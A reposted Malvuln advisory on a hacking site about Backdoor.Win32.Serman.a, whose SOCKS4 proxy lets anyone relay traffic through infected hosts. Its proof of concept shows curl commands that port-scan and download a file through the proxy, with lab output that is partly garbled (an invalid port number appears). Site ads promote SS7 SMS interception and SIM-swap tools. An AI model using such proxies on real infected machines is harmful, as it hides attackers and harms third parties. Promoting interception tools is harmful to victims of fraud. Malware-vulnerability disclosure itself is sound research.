• Advertise
  • SS7 Hacking
Saturday, February 4, 2023
No Result
View All Result
I Need Hack - Hacking Tutorials, News, Tips
  • Home
  • Exploits

    Lenovo Diagnostics Driver Memory Access

    macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

    F5 Big-IP Create Administrative User

    Oracle Database 12.1.0.2 Spatial Component Privilege Escalation

    Packet Storm New Exploits For January, 2023

    io_uring Same Type Object Reuse Privilege Escalation

    vmwgfx Driver File Descriptor Handling Privilege Escalation

    eCommerce Marketplace Platform CMS 1.7 SQL Injection

    eCommerce Marketplace Platform CMS 1.7 Cross Site Scripting

    Trending Tags

    • sms exploit
    • ss7 software
    • simswap software
    • jpg exploit
    • kali linux
  • Hacking News
    Malicious Reward Apps Trick Over 2 Million Android Users

    Malicious Reward Apps Trick Over 2 Million Android Users

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    TROJANPUZZLE Attack Forces AI Assistants to Suggest Rogue Coding

    Multiple Vulnerabilities Found In Samsung Galaxy App Store App

    Researchers Find Class Pollution-A Prototype Pollution Variant That Affects Python

    Be on the lookout for this AnyDesk Phishing campaign that delivers Vidar info stealer

  • Hacking Tools

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

    Trending Tags

    • hacking tools
    • hacking software
    • hacking tips
    • ss7 attacks
    • simswap software
    • sms exploit
  • Hacking Tutorials

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

  • Kali Linux
    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    The Terminal Application Cypherhound contains 260+ Neo4j Cyphers for BloodHound DataSets

    Subparse: Modular Malware Analysis Artifact Collection And Correlation Framework

    Should South East Asian Tech Startups Consider Outsourcing Support?

    Should South East Asian Tech Startups Consider Outsourcing Support?

    AzureHound : Azure Data Exporter For BloodHound

    Xerror is an automated penetration testing tool with GUI

    Mongoaudit is an audit and pentesting tool for MongoDB databases

    Trending Tags

    • kali linux
    • kali tools
    • hacking tools kali
    • kali hacking
    • pentesting
  • Security
    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    EV Charging Stations at Risk of DoS Attacks

    EV Charging Stations at Risk of DoS Attacks

    Most Important Computer Forensics Tools for 2023

    Most Important Computer Forensics Tools for 2023

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    What is an OSINT Tool – Best OSINT Tools 2023

    What is an OSINT Tool – Best OSINT Tools 2023

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

  • Advertise
  • Home
  • Exploits

    Lenovo Diagnostics Driver Memory Access

    macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

    F5 Big-IP Create Administrative User

    Oracle Database 12.1.0.2 Spatial Component Privilege Escalation

    Packet Storm New Exploits For January, 2023

    io_uring Same Type Object Reuse Privilege Escalation

    vmwgfx Driver File Descriptor Handling Privilege Escalation

    eCommerce Marketplace Platform CMS 1.7 SQL Injection

    eCommerce Marketplace Platform CMS 1.7 Cross Site Scripting

    Trending Tags

    • sms exploit
    • ss7 software
    • simswap software
    • jpg exploit
    • kali linux
  • Hacking News
    Malicious Reward Apps Trick Over 2 Million Android Users

    Malicious Reward Apps Trick Over 2 Million Android Users

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    New SH1MMER ChromeOS Exploit Jailbreaks Chromebooks

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Serious 2FA Bypass Vulnerability Affected Facebook And Instagram

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    Multiple Vulnerabilities In Yellowfin BI Could Allow RCE Attacks

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    LearnPress Plugin Vulnerabilities Risk Numerous WordPress Sites

    TROJANPUZZLE Attack Forces AI Assistants to Suggest Rogue Coding

    Multiple Vulnerabilities Found In Samsung Galaxy App Store App

    Researchers Find Class Pollution-A Prototype Pollution Variant That Affects Python

    Be on the lookout for this AnyDesk Phishing campaign that delivers Vidar info stealer

  • Hacking Tools

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

    Trending Tags

    • hacking tools
    • hacking software
    • hacking tips
    • ss7 attacks
    • simswap software
    • sms exploit
  • Hacking Tutorials

    Test3213

    Test 2

    Test 2

    test

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]

    Here are some tips for students to help protect their data privacy

    Client-Side Exploitation [FREE COURSE VIDEO]

    What Common Security Problems Are Cloud-Based Networks?

    Penetration testing OWASP Top 10 Vulnerabilities [FREE COURSE CONTENT]

    OSINT Fundamentals [FREE COURSE CONTENT]

  • Kali Linux
    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    ExchangeFinder : Find Microsoft Exchange Instance For A Given Domain And Identify The Exact Version

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    Villain : Windows And Linux Backdoor Generator And Multi-Session Handler

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    PXEThief : Extract Passwords From The Operating System Deployment Functionality

    The Terminal Application Cypherhound contains 260+ Neo4j Cyphers for BloodHound DataSets

    Subparse: Modular Malware Analysis Artifact Collection And Correlation Framework

    Should South East Asian Tech Startups Consider Outsourcing Support?

    Should South East Asian Tech Startups Consider Outsourcing Support?

    AzureHound : Azure Data Exporter For BloodHound

    Xerror is an automated penetration testing tool with GUI

    Mongoaudit is an audit and pentesting tool for MongoDB databases

    Trending Tags

    • kali linux
    • kali tools
    • hacking tools kali
    • kali hacking
    • pentesting
  • Security
    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    Beware: Malicious Apps On Apple & Google Play Push Users into Fake Investments

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    India’s Largest Truck Brokerage Company Leaking 140GB of Data

    EV Charging Stations at Risk of DoS Attacks

    EV Charging Stations at Risk of DoS Attacks

    Most Important Computer Forensics Tools for 2023

    Most Important Computer Forensics Tools for 2023

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    New DDoS-as-a-Service Platform Attacking Medical Institutions

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    Hackers Use TrickGate Packer to Deploy Emotet, Cobalt Strike & Other Malware

    What is an OSINT Tool – Best OSINT Tools 2023

    What is an OSINT Tool – Best OSINT Tools 2023

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    TrickGate: Malicious Software Outwitting Antivirus for 6 Years

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

    Over 1800 Android Mobile App Web Injects for Sale on Hacking Forums

  • Advertise
No Result
View All Result
I Need Hack - Hacking Tutorials, News, Tips
SS7 SMS Intercept SS7 SMS Intercept SS7 SMS Intercept
Home Exploits

Backdoor.Win32.Serman.a MVID-2022-0659 Unauthenticated Open Proxy

by Ineedhack
December 1, 2022
in Exploits
0
79
SHARES
494
VIEWS
Share on FacebookShare on Twitter
Kripkey Spy Phone Kripkey Spy Phone Kripkey Spy Phone

Credits: Malvuln (John Page, aka Hyp3rlinx), Discovery (c) 2022
Original source: https://malvuln.com/advisory/f312e3a436995b86b205a1a37b1bf10f.txt

Contact: [email protected]

Media: twitter.com/malvuln

Backup media: infosec.exchange/@malvuln

Threat: Backdoor.Win32.Serman.a

Vulnerability to an Unauthenticated Open Proxy

Serman Family

Type: PE32

MD5: f312e3a436995b86b205a1a37b1bf10f

Vuln ID: MVID-2022 – 0659

Disclosure: 11/22/2022

Description: Malware listens to TCP port 212222 default, but this can be modified. An attacker who is able to connect to infected systems can send requests to it from their original connections. An attacker may be able launch attacks or download files from third-party systems. This will make it appear that the attack originated on this infected host.

E.g. using port 5555

Socks4 version 4A server beta

autor: Stanimir Jordanov * e-mail: [email protected]

Usage: socks4 [LogFile]

C:dump>wwm.exe 5555 out.txt

SOCKS 4 service started: redirecting localhost:5555

To end, press Ctrl+C

Connecting to:

Connected with: 192.168.18.128.80 ID:2C34

Closed ID:2C34

Connecting to:

Connected with: 192.168.18.128.80 ID:25BC

Connect closed ID:25BC

Connecting to:

Connected with: 192.168.18.128.80 ID:A4

A4: Connection Closed ID

Exploit/PoC:

Scan port

Connecting to:

Could not connect to:

Connecting to:

Connected with: 192.168.18.128.21 ID:2DE4

Connect closed ID:2DE4

(Port scan):

(Port closed):

C:UsersggDesktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128:666 -v

* Trying 192.168.18.125:5555…

* SOCKS4 communication with 192.168.18.128.666

* SOCKS4 connects to IPv4 at 192.168.18.128.28 (locally solved)

* Could not complete SOCKS4 connection with 0.0.0.0.0. Request rejected (91), or not fulfilled.

* Closest connection 0.

curl: (97). Cannot complete SOCKS4 connection with 0.0.0.0.0. Request rejected, or not received.

(Port open):

C:UsersggDesktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128:21 -v

* Trying 192.168.18.125:5555…

* SOCKS4 communication with 192.168.18.128.21

* SOCKS4 connects to IPv4 at 192.168.18.128.28 (locally solved)

* Socks4 request accepted.

* Connection to 192.168.18.125 (#1) port 5555

> GET / HTTP/1.1

> Host: 192.168.18.128:21

> User-Agent: curl/7.83.1

> Accept: */*

>

* Received HTTP/0.9 even though it was not permitted

* Closest connection 0.

Curl: (1) Received HTTP/0.9 When Not Allowable

(Download files):

C:UsersggDesktop>curl -x socks4://192.168.18.125:5555 http://192.168.18.128/DOOM.exe -v –output 2.txt

* Trying 192.168.18.125:5555…

% Total Received % Average Speed Time Time

Dload Upload Total Spent Left Speed

0/0 0/0 HTML3_ 0* SOCKS4 communications to 192.168.18.128.80

* SOCKS4 connects to IPv4 at 192.168.18.128.28 (locally solved)

* Socks4 request accepted.

* Connection to 192.168.18.125 (#1) port 5555

GET /DOOM.exe HTTP/1.1

Host: 192.168.18.128

User-Agent: curl/7.83.1

Accept: */*

* Not supporting multiuse, mark bundle

* HTTP 1.0, assume close after body

HTTP/1.0 200 OK

Server: SimpleHTTP/0.6 Python/2.7.6

Date: Tue, 22 Nov 2022 02:15:31 GMT

Content-type: application/x-msdos-program

Content-Length: 103533

Last Modified Sat, 03/08/2019 04:57 PM GMT

{ [6794 bytes data]

100 101k 100 101k 0 0 474k 0 –:–:– –:–:– –:–:– 488k

* Closest connection 0.

C:UsersggDesktop>2.txt

DOOMED!! !

To continue, press any key. . .

Disclaimer: This advisory information is provided “as-is,” without warranties, guarantees or other conditions. This advisory may be redistributed, subject to its original form and credit. For inclusion in vulnerability databases or similar programs, permission is granted explicitly provided credit to the author. Author is not responsible for misuse or misappropriation of information and does not accept responsibility for damages resulting from the misuse. Any malicious or illegal use of security-related information, exploits or other methods is prohibited by the author. You should not try to obtain Malware samples. This website does not accept responsibility for damages resulting from Malware handling errors or downloading any Malware. All content copyrighted (c) Malvuln.comTM

Tags: hack newshacking softwarehacking tipshacking toolshacking tutorialsinstagram hackjpg exploitsms exploit
Ineedhack

Ineedhack

Next Post

Web Application Penetration Testing Checklist: A Comprehensive Cheat Sheet

Sim Swap Software Sim Swap Software Sim Swap Software

Recommended

Microsoft Outlook 2019 16.0.13231.20262 Remote code execution

3 months ago

Jettweb Ready Rent A car Script 4 Cross Site

2 weeks ago

Popular News

    • Advertise
    • SS7 Hacking

    ©2017- 2022 Hacking Tutorials

    No Result
    View All Result
    • Home
    • Exploits
    • Hacking News
    • Hacking Tools
    • Hacking Tutorials
    • Kali Linux
    • Security
    • Advertise